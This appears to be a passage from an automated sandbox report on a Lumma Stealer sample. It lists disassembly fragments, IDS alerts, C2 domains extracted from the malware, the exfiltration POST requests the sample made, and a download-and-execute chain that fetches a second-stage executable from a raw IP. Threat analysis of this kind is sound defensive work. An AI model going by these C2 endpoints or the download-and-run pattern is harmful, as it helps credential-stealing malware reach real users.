Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, esi	1_2_024D23F7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ebx], cx	1_2_024D23F7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	1_2_024D23F7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, eax	1_2_024B5BF7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebp, eax	1_2_024B5BF7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	1_2_024C8055
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	1_2_024E887B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	1_2_024D4031
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov edx, ebp	1_2_024D60D7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	1_2_024CC8BA
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_024DA967
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	1_2_024CC17B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	1_2_024BB973
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_024EB127
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then jmp eax	1_2_024E898E
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	1_2_024CA197
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	1_2_024B91B7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], bl	1_2_024B91B7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, eax	1_2_024BDE40
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, eax	1_2_024BDE40
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh	1_2_024C4E87
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh	1_2_024C4E96
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp al, 2Eh	1_2_024D6E96
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_024E56B7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then push 00000000h	1_2_024D9F40
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_024B7757
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_024B7757
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	1_2_024EEF07
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	1_2_024C6F35
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	1_2_024C6F35
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_024C5FD3
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	1_2_024D8FA0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ecx], dx	1_2_024D9444
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	1_2_024D9444
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov esi, eax	1_2_024C5C41
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	1_2_024C7C28
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then xor edi, edi	1_2_024C7C28
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	1_2_024C64CA
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	1_2_024D64DA
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	1_2_024C5487
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	1_2_024DDCBC
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_024DCCB0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ebx], ax	1_2_024CB547
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_024DCD78
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then push esi	1_2_024D7D1A
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_024DCD37
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_024D8DC8
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	1_2_024C75E7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	1_2_024CD5E7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_024DCD89
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	1_2_024EF597

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.4:50223 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.4:49734 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.4:49732 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.4:49733 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.4:49738 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.4:49735 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 104.21.24.223:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 20:09:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 18 Dec 2024 20:00:01 GMTETag: "59e00-62990dbeba307"Accept-Ranges: bytesContent-Length: 368128Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 28 04 00 3c 00 00 00 00 10 42 00 f0 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc f3 03 00 00 10 00 00 00 f4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 21 00 00 00 10 04 00 00 22 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 1a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 12 01 00 00 10 42 00 00 14 01 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 172.67.179.207 172.67.179.207
Source: Joe Sandbox View	IP Address: 176.113.115.19 176.113.115.19

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.24.223:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 172.67.179.207:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rapeflowwj.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: rapeflowwj.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DILV8F4FV6WQ1ZE2IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18152Host: rapeflowwj.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PEOS2F1337User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8731Host: rapeflowwj.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HVMU99Q4EDBVTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: rapeflowwj.lat

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: rapeflowwj.lat

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rapeflowwj.lat

Source: TUp6f2knn2.exe, 00000000.00000003.1751814866.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: TUp6f2knn2.exe, 00000000.00000003.1751814866.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe(
Source: TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe.
Source: TUp6f2knn2.exe, 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exen
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: TUp6f2knn2.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: TUp6f2knn2.exe, 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEQb
Source: B4A1.tmp.exe, 00000001.00000003.1866981043.0000000003205000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/
Source: B4A1.tmp.exe, 00000001.00000002.2190349192.00000000031F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/(
Source: B4A1.tmp.exe, 00000001.00000003.1815897318.00000000009A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/IN
Source: B4A1.tmp.exe, 00000001.00000002.2190349192.00000000031F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/L
